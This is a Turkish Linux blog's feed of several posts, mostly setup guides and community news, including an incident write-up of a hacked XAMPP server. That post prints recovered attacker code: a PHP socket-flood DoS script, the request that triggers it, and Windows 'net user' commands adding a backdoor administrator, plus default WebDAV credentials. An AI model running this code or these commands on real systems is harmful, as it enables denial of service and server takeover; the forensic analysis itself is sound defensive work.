ÇaylakPenguen Blog http://caylak.truvalinux.org.tr/blog Wed, 03 May 2017 21:10:47 +0000 tr-TR hourly 1 https://wordpress.org/?v=4.8 http://caylak.truvalinux.org.tr/blog/wp-content/uploads/2016/08/5bcb813e3af7bf0d9532cbe7d58951a73-1.png ÇaylakPenguen Blog http://caylak.truvalinux.org.tr/blog 32 32 AltLinux Türkçe Dil Desteği http://caylak.truvalinux.org.tr/blog/altlinux-turkce-dil-destegi http://caylak.truvalinux.org.tr/blog/altlinux-turkce-dil-destegi#respond Thu, 06 Apr 2017 19:32:36 +0000 http://caylak.truvalinux.org.tr/blog/?p=2455 Mandriva forumundaki bu soruya cevaben yazılmıştır. indireceğiniz dosya içerisinde türkçe locale ve xfce4 türkçe dil paketleri bulunmaktadır. altlinux paket sistemini bilmediğim için ve hızlıca problemi çözmek için slackware içindeki türkçe yerel paketlerini kullandım. Benim hazırladığım paketi indirin. [crayon-594ce2d9532e9813056492/] sudo su ile root kullanıcısı olun. indirdiğimiz paketi açın. [crayon-594ce2d953302801186405/]   ev dizininizde .i18n adında bir dosya [...]

AltLinux Türkçe Dil Desteği yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
Mandriva forumundaki bu soruya cevaben yazılmıştır.

indireceğiniz dosya içerisinde türkçe locale ve xfce4 türkçe dil paketleri bulunmaktadır.
altlinux paket sistemini bilmediğim için ve hızlıca problemi çözmek için slackware içindeki türkçe yerel paketlerini kullandım.

Benim hazırladığım paketi indirin.

wget -c http://caylak.truvalinux.org.tr/depo/tr_locale.tar.gz

sudo su ile root kullanıcısı olun.
indirdiğimiz paketi açın.

tar -xvf tr_locale.tar.gz -C /

 

ev dizininizde .i18n adında bir dosya oluşturun.

vi ~/.i18n

içeriği ekleyin ve kaydedip çıkın.
sistemi yeniden başlatın.
Açılış yöneticisinde Türkçeyi seçin 🙂

Hepsi bu kadar.

Yardımcı olabildimse ne mutlu bana.

Not: sisteminizde oluşabilecek olası hatalardan ve hasarlardan Hiçbir şekilde Sorumlu değilim.
Yukarında anlatılanları uygulamak veya uygulamamak sizin sorumluluğunuzdadır.

 

 

AltLinux Türkçe Dil Desteği yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
http://caylak.truvalinux.org.tr/blog/altlinux-turkce-dil-destegi/feed 0
Mandriva-tr.org Macerası http://caylak.truvalinux.org.tr/blog/mandriva-tr-org-macerasi http://caylak.truvalinux.org.tr/blog/mandriva-tr-org-macerasi#comments Fri, 24 Mar 2017 20:37:54 +0000 http://caylak.truvalinux.org.tr/blog/?p=2443 Dün akşam fortran osifa  ve ben hareketli bir gece geçirdik. Mandriva-tr.org için ter döktük. Yıllar önce Linux Kullanıcıları Derneği, Linux Topluluklarını tek bir çatı altında toplamak için özel bir sunucu kurmuştu. Bizlerde LKD nin çağrısına uyup tek tek bu sunucuya taşınmıştık. Bir müddet sonra olanlar oldu sunucuda elim bir disk arızasi ile karşılaşıldı. Veriler geri [...]

Mandriva-tr.org Macerası yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>

Dün akşam fortran osifa  ve ben hareketli bir gece geçirdik.
Mandriva-tr.org için ter döktük.

Yıllar önce Linux Kullanıcıları Derneği, Linux Topluluklarını tek bir çatı altında toplamak için özel bir sunucu kurmuştu.
Bizlerde LKD nin çağrısına uyup tek tek bu sunucuya taşınmıştık. Bir müddet sonra olanlar oldu sunucuda elim bir disk arızasi ile karşılaşıldı.
Veriler geri gelmeyecek şekilde kayboldu.
forum.debian.org.tr başta olmak  üzere linux topluluk forumları, web sitelerini başka hosting firmalarına taşıdılar.

forum.debian.org.tr 4 yıllık verilerini kaybetmiş. -> link
truvalinux.org.tr forumu sadece son 2 haftalık veriyi ve kayıt olan 2 kullancıyı kaybetti.

Yedeğiniz yoksa Verilen onca emek bir anda yok oluyor. Gereken sadece 5 dakikanızı ayırıp yedek almak.
Size tavsiyem en azından ayda birkez yedek alın. Sonra üzülürsünüz.

Mandriva-tr.org için aynı sorun yeniden nüksetmek üzereydi.

Konuyu forum.debian.org.tr deki bu tartışma başlığı vasıtasıyla farkettim. -> link
fortran sorumlu arkadaşa ulaştı ve yedek alması konusunda hatırlatma yaptı. -> link
osifa yedekleri alıp bize ulaştırdı.
Mandriva-tr.org sunucusu muallaktaydı. Yani Çökmek üzereydi.

Aşama aşama yazayım.
saat: 21:00
Yedekler elimize ulaştı.
Mandriva-tr.org yi taşınmak için kolları sıvadık.

fortran öncelikli olarak getgnu.org sunucusuna yerleştirmeyi önerdi.
Mandriva-tr.org kurulum için truvalinux u host eden vps yi tercih ettik.
Nedeni Smf forumlarının Mail Mta olmadan mail gönderemiyor olması ve bizim vps de fazlaca bir trafik olmayısıydı.
Getgnu.org un hatırı sayılır trafiği var. Şahsen biliyorum 🙂
getgnu.org günlük yaklaşık 1000 kişiyi ağırlıyor. 😉

saat:22:00
osifa tarafından Dns yönlendirmesi yapıldı.
dosyaları sunucumuza yükledim.
sıra veritabanını geri yüklemeye gelince işler karıştı.
yedek alınan Veritabanı hasarlıydı. Telaş ….

Ne yapmalıyız?
Db yüklenmiyor?

Çözüm Db nin kurulu olduğu hostta phpmyadmin ile recovery işlemi yapılacak.
Tabi takiben yeni bir sorun. Cpanel erişimi yok 🙂

Bereket ftp erişimi var.

Bilgileri aldık osifa sağolsun. bu arada iletişim uzun yoldan gerçekleşiyor.
Ben fortrana jabberden yazıyorum. fortran osifa dan bilgileri alıyor bana aktarıyor.

evet ftp ile bağlanacağım. Oda ne dns leri taşıdığımız için hosta erişim yok !

hostun ip adresi sağolsun 🙂 dns yoksa ip adresi var.

Cpanele erişemediğimiz için ftp ile phpmyadmin dosyalarını aktardık.

Geldik işin en cafcaflı kısmına.
adres satırına yazdım. http://forum.mandriva-tr.org/phpmyadmin
Ahanda host kayıp. Hani dns leri aktarmıştık ya …..
dns kaydı yoksa erişimde yok.

Eski dost hosts dosyası imdada yetişti.
ekledik hemen.

nano /etc/hosts

#ajansup sunucusu
91.191.171.231 www.mandriva-tr.org
91.191.171.231  forum.mandriva-tr.org

saat: Mar 23 2017 23:28:30
arkada Ebru Gündeş çalıyor “şimdilik araftayım”
öff ne gerildim. tamda duruma uygun müzik bu kadarmı rast gelir be.

Neyse güç bela phpmyadmin üzerinden recovery işlemini gerçekleştirdim.

Sqldb yedeğini aldım.

Ftp ile erişip yüklediğim phpmyadmin dosyalarını sileyim dedim.
Fakat odane Ajansup sunucusu tamamen gitti.

Dikkatimi çeken forum dizinindeki log dosyası oldu bir hayli büyümüş.
Zaten sunucu uzun zamandır ben gidiyorum diyormuş 🙂

Neyse biz işimize bakalım.

Saat:23:45

Sqldb yi sunucumuza restore ettim.

Virtualhostları düzenledim.

Nginx ile Mandriva-tr.org harika bir şekilde çalışıyor.

Taşınma işi birazda şansımızında yardımıyla tamamlandı.

Saat 01:00 oldu be 🙂

Bir maceramız daha tamamlandı.

Yorumlarınızı bekleriz ….

https://osifa.wordpress.com/

http://getgnu.org

 

Mandriva-tr.org Macerası yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
http://caylak.truvalinux.org.tr/blog/mandriva-tr-org-macerasi/feed 2
Xampp Kurulumu http://caylak.truvalinux.org.tr/blog/xampp-kurulumu http://caylak.truvalinux.org.tr/blog/xampp-kurulumu#respond Sun, 29 Jan 2017 20:53:04 +0000 http://caylak.truvalinux.org.tr/blog/?p=2391 Dün gece Fortran ile Jabber ‘de muhabbet ederken, Kullandığı Linux Mint Dağıtımı ile php7 paketinin kurulduğunu ve smf 2.0.13 sürümü ile php7 uyumlu olmadığını ve bu nedenle yerelde smf kuramadığını belirtti. Düşünürken aklıma Xampp paketi geldi. php çalışmalarım için gerekli olduğunda kurmuş ve kullanmıştım. Xampp paketi nedir: Xampp paket sistemi ile uğraşmadan linux veya Windows [...]

Xampp Kurulumu yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>

Dün gece Fortran ile Jabber ‘de muhabbet ederken, Kullandığı Linux Mint Dağıtımı ile php7 paketinin kurulduğunu ve smf 2.0.13 sürümü ile php7 uyumlu olmadığını ve bu nedenle yerelde smf kuramadığını belirtti.

Düşünürken aklıma Xampp paketi geldi.

php çalışmalarım için gerekli olduğunda kurmuş ve kullanmıştım.

Xampp paketi nedir:
Xampp paket sistemi ile uğraşmadan linux veya Windows üzerinde Lampp kurmamızı kolaylaştıran
ve tamamen özgür yazılımlardan oluşan bir web paketidir.

UYARI /!\  Xampp paketini sisteminiz direkt internete açıksa yani reel bir ip adresiniz varsa
Xampp ile web yayını (hosting) yapmayınız.

Xampp öntanimli ayarlar ile kullanılırsa sisteminiz hack edilebilir.
Eğer Xampp ile web yayını yapacaksanız Xampp varsayılan şifrelerini değiştirin gerekli olmayan servislerini devre dışı bırakın.

Sebebini öğrenmek için önceki bir yazı var. Tıklayınız.

Xampp paketini download [1] adresinden indirebilirsiniz.

Xampp Kurulumu:

Öncelikle belirteyim, Xampp Paketini kurabilmek için Kullandığınız sistemde root yetkiniz olması gerekiyor. Yani sudo hakkınız olmalı.

indirmiş olduğunuz run uzantılı pakete öncelikle çalşıtırılabilir özelliği vermek gerekiyor.

sudo chmod +x xampp-linux-5.6.23-0-installer.run

Kurmak için

sudo ./xampp-linux-5.6.23-0-installer.run

 

Kurulum Başladı 🙂

 

Kurulum Tamamlandığında sizi Xampp Manager karşılayacak.

firefox açıp localhost yazdığınızda sizi bu pencere karşılayacak.

php info ekranı.

Kurulumdan Sonra

Xampp Menüye veya Başlagıç kısmına Başlatıcı oluşturmuyor.
Bu nedenle Xampp başlatmak için iki seçeneğiniz var.

Birincisi komut satırı.

caylak@matedesktop:~$ sudo /opt/lampp/lampp
Usage: lampp <action>

start Start XAMPP (Apache, MySQL and eventually others)
startapache Start only Apache
startmysql Start only MySQL
startftp Start only ProFTPD

stop Stop XAMPP (Apache, MySQL and eventually others)
stopapache Stop only Apache
stopmysql Stop only MySQL
stopftp Stop only ProFTPD

reload Reload XAMPP (Apache, MySQL and eventually others)
reloadapache Reload only Apache
reloadmysql Reload only MySQL
reloadftp Reload only ProFTPD

restart Stop and start XAMPP
security Check XAMPP's security

enablessl Enable SSL support for Apache
disablessl Disable SSL support for Apache

backup Make backup file of your XAMPP config, log and data files

oci8 Enable the oci8 extenssion

panel Starts graphical XAMPP control panel

caylak@matedesktop:~$

İkincisi Xamppp Manager.

Xampp Manager için Başlatıcı oluşturabilirsiniz.

Masaüstünde Sağ tık -> Başlatıcı Oluştur

komut kısmına.

gksu /opt/lampp/manager-linux.run

yazınız.

Xampp paketini çalıştırmak için sudo yetkinizin olması gereklidir.
Bu nedenle başlatıcıyı tıkladığınızda sizden şifrenizi girmenizi isteyen bir pencere açılacaktır.

Şifrenizi girin ve Tamam tuşuna basın.

Xampp manager Karşınızda.

Manage Servers Tabına geçerek sunucuları başlatıp durdurabilirsiniz.

Çalışma Dizinin Hazırlanması.

Xampp paketinin wwwroot dizini varsayılan /opt/lampp/htdocs klasörüdür.

Biz bu dizini kullanmak yerine ev dizinimizde bir çalışma dizini oluşturup
buradan çalışacağız.

Sırasıyla aşağıdaki komutları kullanıcı olarak konsoldan işletin.

mkdir ~/php
chmod 755 ~/php

 

Bunun için şimdi apache ‘ye alias tanımayacağız.

sudo nano /opt/lampp/etc/extra/httpd-caylak-php-dizini.conf

 

dosya içeriği

Alias /php/ "/home/caylak/php/"

<Directory "/home/caylak/php/">
Options Indexes MultiViews
AllowOverride None
Require all granted
</Directory>

 

Apache yapılandırmasına minik bir ek yapacağız.

sudo nano /opt/lampp/etc/httpd.conf

Include "/opt/lampp/etc/extra/httpd-caylak-php-dizini.conf"

kaydedip çıkın.

Xampp panelinden sunucuları yeniden başlattığınızda php dizinize erişebileceksiniz.

Firefox adres satırına yazın

http://localhost/php/

 

işte sonuç 🙂


1 – Xampp indirme Adresi:
https://www.apachefriends.org/tr/index.html

Kendime ipucu tadında bir makale. 😀

Güle Güle Kullanınız.

 

Xampp Kurulumu yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
http://caylak.truvalinux.org.tr/blog/xampp-kurulumu/feed 0
Banana ARM Türkiye Destek Sitesi Açıldı http://caylak.truvalinux.org.tr/blog/banana-arm-turkiye-destek-sitesi-acildi http://caylak.truvalinux.org.tr/blog/banana-arm-turkiye-destek-sitesi-acildi#respond Thu, 26 Jan 2017 21:41:17 +0000 http://caylak.truvalinux.org.tr/blog/?p=2385 Truva Linux’u geliştiren ekip olarak günümüzde gittikçe popülerleşen ARM cihazların ilerlemesine destek olması amacı ile Banana ARM sistemlere yönelik olarak sitemizi kurmuş bulunuyoruz. Sizlerin de katkısı ile daha iyi noktalara ulaşmaya çalışacağız. Keyifli forumlar dileriz Banana ARM Türkiye Destek Forumu Yönetimi

Banana ARM Türkiye Destek Sitesi Açıldı yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
Truva Linux’u geliştiren ekip olarak günümüzde gittikçe popülerleşen ARM cihazların ilerlemesine destek olması amacı ile Banana ARM sistemlere yönelik olarak sitemizi kurmuş bulunuyoruz. Sizlerin de katkısı ile daha iyi noktalara ulaşmaya çalışacağız.

Keyifli forumlar dileriz

Banana ARM Türkiye Destek Forumu Yönetimi

Banana ARM Türkiye Destek Sitesi Açıldı yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
http://caylak.truvalinux.org.tr/blog/banana-arm-turkiye-destek-sitesi-acildi/feed 0
Bir Saldırı Hikayesi http://caylak.truvalinux.org.tr/blog/bir-saldiri-hikayesi http://caylak.truvalinux.org.tr/blog/bir-saldiri-hikayesi#respond Mon, 16 Jan 2017 20:16:17 +0000 http://caylak.truvalinux.org.tr/blog/?p=2378 Web sunucularımız üzerinde muhtelif betik dilleriyle yazılmış olan web uygulamaları çalıştırıyoruz. Genellikle çalışan web uygulamalarının iyi niyetli olmasından dolayı web sunucularımız genellikle standar kurulduğu halde kalıyor. Özel bir yapılandırma veya güçlendirme yapmaksızın kullanıcıların sunucularımza dosya yüklemesine ve çalıştırmasına izin veriyoruz. Buradaki önemli soru web sunucularımızda çalışacak olan PHP, ASP, Python gibi betiklerin neler yapabileceği… Bir [...]

Bir Saldırı Hikayesi yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
Web sunucularımız üzerinde muhtelif betik dilleriyle yazılmış olan web uygulamaları çalıştırıyoruz. Genellikle çalışan web uygulamalarının iyi niyetli olmasından dolayı web sunucularımız genellikle standar kurulduğu halde kalıyor. Özel bir yapılandırma veya güçlendirme yapmaksızın kullanıcıların sunucularımza dosya yüklemesine ve çalıştırmasına izin veriyoruz. Buradaki önemli soru web sunucularımızda çalışacak olan PHP, ASP, Python gibi betiklerin neler yapabileceği…

Bir süre önce yüksek bantgenişliğine sahip bir web sunucunda tuhaf şeyler olduğu, sunucudan ne olduğu belli olmayan çok sayıda paketin çıktığı ve çok yüksek bangenişliği tüketildiğine dair bir şikayet aldım.

Olayı yerinde incelemek için bir otobüse atlayıp 6 saatlik bir yolculuk yaptıktan sonra nihayet sistem odasına ulaşabildim. Soruna neden olan web sunucusu Windows Server 2008 RC2 işletim sistemine sahip bir Windows sunucuydu. Üzende Xammp web sunucu paketi kurulmuştu ve PHP ile yazılmış özel bir web uygulaması bu sistemde çalışmaktaydı.

İlk olarak XAMMP paketiyle gelen Apache web sunucunun loglarını incelemek için log dosyasına baktığımda log dosyasının hiç arşivlenmediğini ve bu yüzden devasa boyutları ulaştığını gördüm. İyi yanı uğraşmam gerekcek tek bir log dosyası vardı kötü yanı ise bu dosya neredeyse 2 GB civarındaydı. Windows ortamında bu dosyayı açarak içerisindeki kayıtları incelememi sağlayacak bir teknoloji bulunmadığından dosyanın bir kopyasını emektar Ubuntu makineme aktardık.

Aktarım işlemi bittiğinde sunucu odasından daha sessiz ve rahat bir yerde oturup ~2G boyutundaki bir text dosyasını şüpheli durumlar için incelemeye başladık. Tabii ki bu aşamada cat, grep, cut, awk, less gibi muhteşem araçları kullandığımız için çok fazla sıkıntı yaşamadık…

Bir yandan devasa boyuttaki logları incelemeye devam ederken, bir yandan da sistemi olası bir sıradışı durum için göz altında tutmaya devam ettik. Ancak akşama kadar beklememize rağmen sistemde her hangi bir sıradışı durum gözlenmedi…

Bu süreçte sunucuya gelen tüm trafiğin kayıt edilidği pcap dosyalarını incelemeye başladım. Pcap dosyalarından tek görebildiğim bozuk UDP paketlerinin belirli IP adreslerine doğru yol aldığıydı. Kayıt edilen pcap dosyalarını incelerken nihayet UDP paketlerinin uçuşmaya başladığı anı keşfettim…

Web sunucuna aşağıdaki gibi bir GET istediği geldiğinde bozuk UDP paketlerinin uçuşmaya başlıyordu.

GET /webdav/sh.php?host=kurban.com&port=8021&protocol=udp&time=36060 HTTP/1.1
Host: 123.123.123.123
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip , deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Bu neler olup bittiğine dair en önemli ip ucuydu. Bir saldırgan sisteme yüklenmiş olan bir dosyaya host, port, protocol ve time parametreleri göndererek bir DoS saldırısı başlatıyordu. Bu saldırı ise çok büyük bant genişliği tüketilmesine neden oluyordu…

Yine cat, grep gibi şahane Unix araçları kullanılarak Apache web sunucuna ait loglar incelendiğinde aşağıdaki gibi bir kayıt tespit edildi.

111.111.111.111 - wampp [25/Feb/2011:07:39:46 +0200] "PUT /webdav/sh.php HTTP/1.1" 201 361 "-" "WEBDAV Client"

Yani bir saldırgan yazmaya açık olan webdav dizinine sh.php dosyasını yüklemeyi başarmıştı. Kayıtları incelenmeye devam ettiğimde sisteme üç dosya daha eklendiğini fark etmem uzun sürmedi. Ancak zop.php isimli dosya çalıştırıldıktan sonra silindiği için kod analizi yapma şansım olmadı. Silinen dosya kurtarılarak incelenebilirdi ancak Sunucu sistemi aktif olarak çalışmaya devam ettiği için dosya kurtarma çalışması yapmama izin verilmedi.

111.111.111.111 - wampp [25/Feb/2011:07:39:51 +0200] "PUT /webdav/au.php HTTP/1.1" 201 361 "-" "WEBDAV Client" 
111.111.111.111 - wampp [25/Feb/2011:07:39:46 +0200] "PUT /webdav/help.php HTTP/1.1" 201 363 "-" "WEBDAV Client"
111.111.111.111 - wampp [25/Feb/2011:07:39:51 +0200] "PUT /webdav/zop.php HTTP/1.1" 201 362 "-" "WEBDAV Client"
111.111.111.111 - - [25/Feb/2011:07:39:55 +0200] "GET /webdav/zop.php HTTP/1.1" 200 57 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
111.111.111.111 - wampp [25/Feb/2011:07:39:55 +0200] "DELETE /webdav/zop.php HTTP/1.1" 204 - "-" "WEBDAV Client"

Saldırgan tarafından sisteme yüklenen bu dosyaları bulduktan sonra ilk iş dosyaların kaynak kodlarını incelemek oldu.

İlk olarak sh.php dosyasına bir göz atalım.

if(isset($_GET['update'])){ //Update the shell
  $currentFile = $_SERVER["SCRIPT_NAME"];
  $parts = Explode('/', $currentFile);
  $currentFile = $parts[count($parts) - 1];

  $newshell = $_GET['update'];
  copy($newshell, $currentFile);
 }

Bu satırlar web uygulamasının kendisini update etmesini sağlıyor. Böylece saldırgan dilediği zaman sh.php dosyasını update parametresi ile çağırarak güncelleyebiliyor.

ignore_user_abort(TRUE);
set_time_limit(0);

Eğer saldırgan sh.php dosyasına bir hedef göstermişse, sh.php betiği ignore_user_abort değerini True yaparak kendisinin dışarıdan gelecek bir kesmeyle durdurulmasını engelliyor.

set_time_limit değeri sıfır yapılarak sh.php betiğinin zaman aşımına uğraması ve durdurulması engelleniyor. Bu sayede sh.php betiği sonsuza kadar çalışabilir hale geliyor.

for($i=0;$i<8192;$i++){
        $out .= 'X';
}

Bu kod hedef sisteme gönderilecek olan paketin data kısmını oluşturuyor. Yaptığı tek şey $out değişkeninde, 8192 karakter uzunluğunda X harflerinden oluşan bir metin yaratmak.

$fp[4096];

for ($i = 0; $i<4096; $i++) {
 if($fp[$i]){
  fwrite($fp[$i], $out);
 }else{
  $fp[$i] = fsockopen($protocol.'://'.$host, $port, $errno, $errstr, 1);
  fwrite($fp[$i], $out);
 }
}

Ve yukarıdaki kod parçacığı while(1) kısır döngüsü içerisinde, 4096 adet soket açarak, hedef sistme bağlantı kuruyor. Açılan her bir sokete 8192 byte uzunluğundaki $out değişkenini yazıyor. Sonuç olarak hedef sisteme çok yüksek sayıda ve büyüklükte paket gönderilmesine neden oluyor…

if(time() > $max_time){
 for ($i = 0; $i<4096; $i++) //Close all sockets
  fclose($fp[$i]);
 exit;
}

Bu döngü saldırganın belirttiği süre dolduğunda otomatik olarak son buluyor ve açılan soketler kapatılarak sh.php betiğinden çıkılıyor…

Şimdi saldırgan tarafından sisteme yüklenen diğer betiklerin ne olduğuna bir bakalım.

au.php dosyası içeriği;

exec('net user helpuser Password!23 /ADD', $results2);
exec('net localgroup "Remote Desktop Users" helpuser /add', $results4);
exec('net localgroup administrators helpuser /add', $results3);

Yukarıdaki kodlar Windows’un net komutunu çalıştırarak sisteme bir kullanıcı ekliyor, ardından eklediği kullanıcıyı “Remote Desktop Users” grubuna ekliyor. Son olarak çalıştırılan net localgroup komutu ise saldırgan tarafından eklenen kullanıcıyı administrators grubuna ekleyerek yönetici yetkilerini veriyor.

Bu kodlar başarıyla çalıştığında saldırgan, sisteme Uzak Masaüstü bağlantısı yapabilen ve Admin yetkilerine sahip bir kullanıcıya sahip oluyor. Yani tam anlamıyla sunucuyu ele geçirmiş durumda…

Saldırgan Dosyaları Nasıl Yüklemiş?

Sunucu kurulumunu yapan firma “kolay” olması açısından XAMMP paketini kurmayı tercih etmiş. Ellerindeki kurulum dosyasının üzerine çift tıklayıp next next next diyerek web sunucusu kurulumu yapmışar ve müşterilerine teslim etmişler. Gözden kaçırdıkları nokta aslında gerekli olmayan webdav servisinin açık olmasıymış.

İşin daha da vahim tarafı sisteme kurdukları XAMMP paketinde, ön tanımlı webdav kullanıcı adı ve parolasının wampp / xampp olarak geldiğini gözden kaçırmışlar.  Saldırgan ip adreslerini dolaşıp webdav açığı ararken bu sununyucu fark ettiğinde bir webdav istemcisiyle dosyaları sisteme yüklemiş ve akabinde php betiklerini çalıştırarak sistemi ele geçirmiş…

Ölümcül hatalardan bir diğeri ise XAMMP paketi kurulurken hiç bir özel yapılandırma olmaksızın kurulması. Apache web sunucusu Windows 2008 RC2 işletim sistemi üzerinde System yetkileri ile çalışıyor. Sonuç olarak çalışıtırılan php betikleri de System yetkileri ile çalışıyor. Bu nedenle saldırgan çok kolay bir şekilde sisteme kullanıcı ekleyip, bu kullanıcıyı administrator grubuna dahil edebiliyor…

Oysa web sunucusu için kısıtlı yetkilere sahip bir kullanıcı hesabı açılsa ve web sunucu servisi bu kullanıcı yetkileriyle çalışacak şekilde yapılandırılmış olsa saldırının sonuçları bu kadar vahim olmayacaktı…

Diğer yandan kullanılan XAMMP paketinin güncel bir sürümü yüklenmiş olsa, güncellemeleri takip edilmiş olsa veya kullanılmadığı halde çalışan webdav kapatılmış olsa böyle bir sıkıntı yaşanmayacaktı.

Bu olaydan çıkması gereken derslere gelirsek;

0- Ezbere sunucu kurmayın.
1- Gereksiz servis çalıştırmayın.
2- Servisleri System yetkileriyle çalıştırmayın.
3- Ön tanımlı parolalar varsa mutlaka değiştirin.

 

Bir Saldırı Hikayesi yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
http://caylak.truvalinux.org.tr/blog/bir-saldiri-hikayesi/feed 0
Slackware Live Edition 1.1.4 Live ISO Duyuruldu http://caylak.truvalinux.org.tr/blog/slackware-live-edition-1-1-4-live-iso-duyuruldu http://caylak.truvalinux.org.tr/blog/slackware-live-edition-1-1-4-live-iso-duyuruldu#respond Fri, 02 Dec 2016 21:21:05 +0000 http://caylak.truvalinux.org.tr/blog/?p=2361 Eric Hameleers tarafından 10 Kasım 2016‘da Slackware Live Edition’ın 1.1.4 sürümü duyuruldu. Kaynak: http://alien.slackbook.org/blog/slackware-live-edition-1-1-4-based-on-slackware-current-of-4-nov-2016/ Download Kaynakları: Primary location: http://bear.alienbase.nl/mirrors/slackware-live/ (rsync://bear.alienbase.nl/mirrors/slackware-live/) Darren’s mirror (also fast!): http://slackware.uk/people/alien-slacklive/ (rsync://slackware.uk/people/alien-slacklive/) Willy’s mirror: http://repo.ukdw.ac.id/slackware-live/ Ryan’s mirror: https://seattleslack.ryanpcmcquen.org/mirrors/slackware-live/ Shasta’s mirror: http://ftp.slackware.pl/pub/slackware-live/ (rsync://ftp.slackware.pl/slackware-live/) Tonus’s mirror: http://ftp.lip6.fr/pub/linux/distributions/slackware/people/alien-slacklive/

Slackware Live Edition 1.1.4 Live ISO Duyuruldu yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
bluepiSWEric Hameleers tarafından 10 Kasım 2016‘da Slackware Live Edition’ın 1.1.4 sürümü duyuruldu.

Kaynak: http://alien.slackbook.org/blog/slackware-live-edition-1-1-4-based-on-slackware-current-of-4-nov-2016/

Download Kaynakları:

Slackware Live Edition 1.1.4 Live ISO Duyuruldu yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
http://caylak.truvalinux.org.tr/blog/slackware-live-edition-1-1-4-live-iso-duyuruldu/feed 0
Getgnu.org Macerası – II http://caylak.truvalinux.org.tr/blog/getgnu-org-macerasi-2 http://caylak.truvalinux.org.tr/blog/getgnu-org-macerasi-2#respond Tue, 29 Nov 2016 21:43:04 +0000 http://caylak.truvalinux.org.tr/blog/?p=2352 Getgnu.org web sunucusunda bu hafta olağan dışı bir hareket gözlemledik. anlaşılan o ki hackerlerin hedefi bu kez getgnu.org sunucusuydu. Getgnu.org Sitesini barındıran Vps sunucumuzun Cpu kullanımı Devamlı surette %100 sınırına ulaşıyordu. Yoğun bir Ddos saldırısına maruz kaldığımızı anlamamız biraz vakit aldı. Saldırgan kendisini google bot olarak tanıttığından biz sadece robots.txt dosyasını düzenleyip tüm botlara siteyi [...]

Getgnu.org Macerası – II yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
getgnu_logoGetgnu.org web sunucusunda bu hafta olağan dışı bir hareket gözlemledik.
anlaşılan o ki hackerlerin hedefi bu kez getgnu.org sunucusuydu.
Getgnu.org Sitesini barındıran Vps sunucumuzun Cpu kullanımı Devamlı surette %100 sınırına ulaşıyordu.

cpu-100-100

Yoğun bir Ddos saldırısına maruz kaldığımızı anlamamız biraz vakit aldı.
Saldırgan kendisini google bot olarak tanıttığından biz sadece robots.txt dosyasını düzenleyip
tüm botlara siteyi kapattık. durum değişmedi. Saldırgan bot olmadığı için aldığımız tedbir yeterli olmadı ve saldırılar devam etti.

ddos-02

Bu resim de xmlrpc.php dosyasına yapılan istekleri görüyorsunuz. oldukça Fazla istek var. (289260 istek)

ddos-00

Sisteme fail2ban kurduk. ek tedbir olarak Saldırgan ip adreslerini iptables ile blokladık.

iptables -A INPUT -s 163.172.141.185 -j DROP
iptables -A INPUT -s 163.172.189.230 -j DROP

Getgnu.org sitesi şu an stabil şekilde görevini yapmaya devam ediyor.

 

ddos-01

 

Getgnu.org Macerası – II yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
http://caylak.truvalinux.org.tr/blog/getgnu-org-macerasi-2/feed 0
tmux klavye kısayolları http://caylak.truvalinux.org.tr/blog/tmux-klavye-kisayollari http://caylak.truvalinux.org.tr/blog/tmux-klavye-kisayollari#respond Sun, 13 Nov 2016 20:02:27 +0000 http://caylak.truvalinux.org.tr/blog/?p=2341 Genel tmux kısayolları: ctrl+b ? yardım ctrl+b s mevcut oturumları (session) listeleme ve geçiş ctrl+b d oturumdan ayrılma (detach) ctrl+b c yeni pencere oluşturma (create) ctrl+b , pencere adını değiştirme ctrl+b l son (last) pencereye dön ctrl+b n sonraki pencere (next) ctrl+b p önceki pencere (previous) ctrl+b w pencereleri (window) listeleme ve geçme ctrl+b <num> [...]

tmux klavye kısayolları yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
split

Genel tmux kısayolları:
ctrl+b ? yardım
ctrl+b s mevcut oturumları (session) listeleme ve geçiş
ctrl+b d oturumdan ayrılma (detach)
ctrl+b c yeni pencere oluşturma (create)
ctrl+b , pencere adını değiştirme
ctrl+b l son (last) pencereye dön
ctrl+b n sonraki pencere (next)
ctrl+b p önceki pencere (previous)
ctrl+b w pencereleri (window) listeleme ve geçme
ctrl+b <num> <num> numaralı pencereye geçme
ctrl+b % paneli dikey böler
ctrl+b ” paneli yatay böler
ctrl+b <space> panel yerleşim modunu değiştirir
ctrl+b ctrl+o panellerin yerlerini değiştirir
ctrl+b o paneller arasında geçiş
ctrl+b q panel numaralarını gösterme ve geçme
ctrl+b <ok tusu> paneller arasında geçiş
ctrl+b ctrl+<ok tusu> panel boyunu ok yönünde değiştirme
ctrl+b [ copy moda geçer <ok tuşları>
ctrl+space seçmeye başlar alt+w seçili alanı kopyalar
ctrl+b ] paste eder
ctrl+b = bufferdan seçip paste eder
ctrl+b t zamanı (time) gösterme
ctrl+b : komut modu

kaynak: http://beyaz.net/tr/ipucu/entry/484/

tmux klavye kısayolları yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
